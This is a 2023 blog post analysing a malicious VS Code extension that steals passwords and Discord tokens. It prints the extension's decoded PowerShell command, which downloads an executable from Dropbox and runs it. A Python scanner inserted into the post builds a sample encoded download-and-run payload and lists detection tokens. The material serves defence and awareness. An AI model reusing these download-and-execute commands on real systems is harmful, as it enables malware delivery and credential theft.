The Enemy Within

Michael Loomis
4 min read · Jun 23, 2023


Hidden dangers of VS Code extensions

Edit: Microsoft has removed this extension as of 7/3/2023 in response to my report.

Congratulations! You’re learning how to code.

It’s time to get your VS Code up and running.

VS Code has a marketplace for extensions, similar to the Chrome Web Store. There are extensions for themes, language formatting, syntax highlighting, remote connections, and nearly anything else you can think of. Some are insanely popular:

Popular extensions

Notice the verified checkmark on three of those. That’s typically a good sign: it means the publisher has been verified by Microsoft. While the majority of these extensions, even ones that don’t have millions of installs, are safe to use, there are always risks when installing a plugin or add-on into your system. Extensions have the ability to execute code both inside and outside of VS Code, and that gives a bad actor plenty of opportunity to do unexpected things.

Malicious Extensions

What does that look like?

Malicious extensions could do a range of things including: steal passwords, download additional software like ransomware or remote access programs, steal documents, or record the screen and log keyboard entries.

How do they do it?

Typically these extensions contain obfuscated (hidden) code that runs when the user loads or uses the extension. Often the extension works as advertised, but ALSO does the unexpected thing. They tend to use names similar to popular extensions so they show up when someone searches for ‘python’ or ‘prettier’ or ‘dracula’ (a popular theme). Recently there were malicious extensions named ‘prettiest-java’ and ‘darcula’ whose tags and images looked just like the real extension.

https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/

Microsoft has vowed to crack down on these, but they are still easily found.

Coding together

Collaborative coding is a really great way to learn. There are probably several ways to code with friends.

Awesome, I was looking for that. Here’s what the developer says:

That sounds perfect. Let’s get that.

DO NOT ACTUALLY DO THAT

Code with Friends is actually a password stealer, Discord token stealer, and remote access software.

Extensions come in a .vsix format. It’s essentially a .zip file, so you can change the name and then extract the archive. You will get this:

Looking at its package.json file:

Powershell execution

Wait…what?! This extension is executing a PowerShell command…

What is the command?

Aww crap, it’s encoded. We can fix that!

powershell Invoke-WebRequest -Uri 
"https://dl.dropbox.com/s/5mp5s3ta5skt5rv/[removed]?dl=0"
-OutFile "~/tmp-lvnsoasss.exe"; Invoke-Expression "~/tmp-lvnsoasss.exe"

I added new lines to make it easier to read, but in short this extension goes out to Dropbox, downloads a new file and then executes that file.
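The inspection steps above (treat the .vsix as a zip, read extension/package.json, decode the encoded command, look at what it does) can be scripted so that an extension is checked before it is installed. The Python below is an added example, not code from the post. It assumes the encoding used is PowerShell’s -EncodedCommand form (base64 of UTF-16LE text), which is the common case but which the post does not state, and it builds its own constructed sample .vsix with a placeholder URL rather than using the real file.

```python
import base64
import io
import json
import re
import zipfile

# Tokens that a reviewer would want flagged in a decoded command (constructed
# list: download-and-run primitives, matching the shape seen in the post).
SUSPICIOUS_TOKENS = ("Invoke-WebRequest", "Invoke-Expression", "DownloadString",
                     "-OutFile", "Start-Process", "iex ", "iwr ")

# Assumption: the command is passed with PowerShell's -EncodedCommand switch
# (or its short forms), followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})",
                        re.IGNORECASE)


def encode_command(script: str) -> str:
    """Produce the base64 form PowerShell expects for -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_command: base64 -> UTF-16LE bytes -> script text."""
    return base64.b64decode(b64).decode("utf-16-le")


def walk_strings(obj):
    """Yield every string value anywhere in a parsed JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from walk_strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from walk_strings(value)


def scan_vsix(data: bytes) -> list:
    """Open a .vsix (it is a zip) and report every string in
    extension/package.json that mentions PowerShell, decoding any
    -EncodedCommand payload and listing the suspicious tokens found."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        manifest = json.loads(zf.read("extension/package.json"))
    findings = []
    for raw in walk_strings(manifest):
        if "powershell" not in raw.lower():
            continue
        decoded = None
        match = ENCODED_RE.search(raw)
        if match:
            try:
                decoded = decode_encoded_command(match.group(1))
            except (ValueError, UnicodeDecodeError):
                decoded = None  # not valid UTF-16LE base64; report the raw string
        text = decoded if decoded is not None else raw
        indicators = [t for t in SUSPICIOUS_TOKENS if t.lower() in text.lower()]
        findings.append({"raw": raw, "decoded": decoded, "indicators": indicators})
    return findings


def build_sample_vsix() -> bytes:
    """Constructed sample: a minimal .vsix whose package.json runs an encoded
    PowerShell command from an install script. The URL is a placeholder, not
    the post's real one, and the file name is made up."""
    script = ('Invoke-WebRequest -Uri "https://example.invalid/[placeholder]" '
              '-OutFile "~/tmp-sample.exe"; Invoke-Expression "~/tmp-sample.exe"')
    manifest = {
        "name": "code-with-friends-lookalike",  # constructed name
        "scripts": {"postinstall": "powershell -EncodedCommand " + encode_command(script)},
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension/package.json", json.dumps(manifest))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_vsix(build_sample_vsix()):
        print("raw:       ", finding["raw"][:70] + "...")
        print("decoded:   ", finding["decoded"])
        print("indicators:", finding["indicators"])
```

To check a real download, replace build_sample_vsix() with the bytes of the .vsix file. The scan only looks at package.json, the same place the post found the command; an extension can also run commands from its JavaScript, so an empty report is not a clean bill of health, but a decoded download-and-run command is reason enough not to install.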

That should be enough to have my antivirus flag it…Nope. Bitdefender is silent.

Actually, they are all silent about this file according to VirusTotal:

Is it actually malicious? What does the file do?

I submitted it to JoeSandbox and Hybrid Analysis, two well-known sandboxes that run a sample inside a virtual machine and record what it does, to see what would happen if the program was executed.

Things are getting interesting

JoeSandbox
Hybrid-Analysis

So not as benign an extension as we thought…

The domains it calls out to are associated with multiple password stealers, trojans, and ransomware packages, though this one doesn’t appear to be ransomware. Interestingly, it reaches out to Discord to download additional PowerShell scripts that help it bypass more of the security features built into Windows.

This particular one was not detected by any of the main anti-virus and anti-malware packages, though I suspect that’s because it is very new; they now have the hash since I submitted it to their databases.

The VS Code marketplace was alerted to the malicious software and I will provide an update when/if they respond or take the package down.

Final thoughts

Be careful which extensions you install. Look for verified publishers with the blue checkmark. Make sure that what you click on is what you expect and not a slightly misspelled lookalike meant to trick you. If all else fails, ask a friend to check it out first.

Michael Loomis

Nurse + Geek interested in technology that enables better care and outcomes. Dad, ice hockey player, and car enthusiast.